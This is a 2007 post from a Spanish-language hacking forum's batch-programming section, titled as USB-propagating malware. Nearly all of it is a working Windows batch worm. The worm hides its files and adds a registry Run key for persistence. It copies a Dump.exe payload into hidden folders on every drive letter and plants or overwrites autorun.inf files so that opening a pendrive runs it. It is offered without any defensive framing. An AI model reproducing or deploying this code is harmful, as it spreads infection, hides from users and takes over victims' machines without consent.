ÍndiceÍndice  PortalPortal  CalendarioCalendario  FAQFAQ  BuscarBuscar  RegistrarseRegistrarse  MiembrosMiembros  Grupos de UsuariosGrupos de Usuarios  Conectarse  

Comparte | 
 

 MALWARE de propagacion via pendrives

Ir abajo 
AutorMensaje
[Somnophore]
.:Moderador Del Mal:.
.:Moderador Del Mal:.
avatar

Masculino Cantidad de envíos : 131
Edad : 31
Fecha de inscripción : 06/08/2007

MensajeTema: MALWARE de propagacion via pendrives   Jue Ago 09, 2007 4:32 am

Código:
@echo off
attrib +s +h %0
msg * hacked by -={ naxo itc }=-
reg add hklm\software\microsoft\windows\currentversion\run /V Dump.exe /D C:\Drivers\Dump.exe /f

:bluce
ping -n 10 127.0.0.1
IF exist C:\Drivers (goto 02) else (md C:\Drivers & attrib +h +s C:\Drivers & goto 02)
:02
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers (goto a) else (md %%A:\Drivers & attrib +h +s %%A:\Drivers & goto a) )

:a
IF exist C:\Drivers\Dump.exe (goto 05) else (goto 04)
:04
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -s -h %%A:\Drivers\Dump.exe & copy "%%A:\Drivers\Dump.exe" "C:\Drivers\Dump.exe" & attrib +s +h %%A:\Drivers\Dump.exe)
attrib +h +s C:\Drivers\Dump.exe
:05
IF exist C:\autorun.inf (goto 07) else (goto 06)
:06
echo [AutoRun]>>C:\autorun.inf
echo label= naxo itc>>C:\autorun.inf
echo open=Drivers\Dump.exe>>C:\autorun.inf
echo shellexecute=Drivers\Dump.exe>>C:\autorun.inf
echo shell\Auto\command=Drivers\Dump.exe>>C:\autorun.inf
attrib +h +s C:\autorun.inf
:07
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" C:\autorun.inf') do set co=%%B
if naxo== %co% (goto b) else (goto nar)
:nar
attrib -h -s C:\autorun.inf
del /f /q C:\autorun.inf
goto 06

:b
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\Drivers\Dump.exe (goto 08) else (attrib -s -h C:\Drivers\Dump.exe & copy "C:\Drivers\Dump.exe" "%%A:\Drivers\Dump.exe" & attrib +h +s %%A:\Drivers\Dump.exe & attrib +s +h C:\Drivers\Dump.exe & goto 08) )
:08
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
IF exist %%A:\autorun.inf (goto 09) else (attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce) )

:09
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
for /f "tokens=2 DELIMS= " %%B in ('FIND /I "naxo" %%A:\autorun.inf') do set co=%%B )
if naxo== %co% (goto bluce) else (goto her)
:her
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s %%A:\autorun.inf & del /f /q %%A:\autorun.inf )
FOR %%A IN (E F G H I J K L M N O P Q R S T U V W X Y Z) DO (
attrib -h -s C:\autorun.inf & copy "C:\autorun.inf" "%%A:\autorun.inf" & attrib +h +s %%A:\autorun.inf & attrib +h +s C:\autorun.inf & goto bluce )

_________________







"El ignorante afirma, el sabio duda y reflexiona"
Volver arriba Ir abajo
Ver perfil de usuario http://www.iaedelmal3.blogspot.com
 
MALWARE de propagacion via pendrives
Volver arriba 
Página 1 de 1.

Permisos de este foro:No puedes responder a temas en este foro.
 :: Programacion :: Batch-
Cambiar a: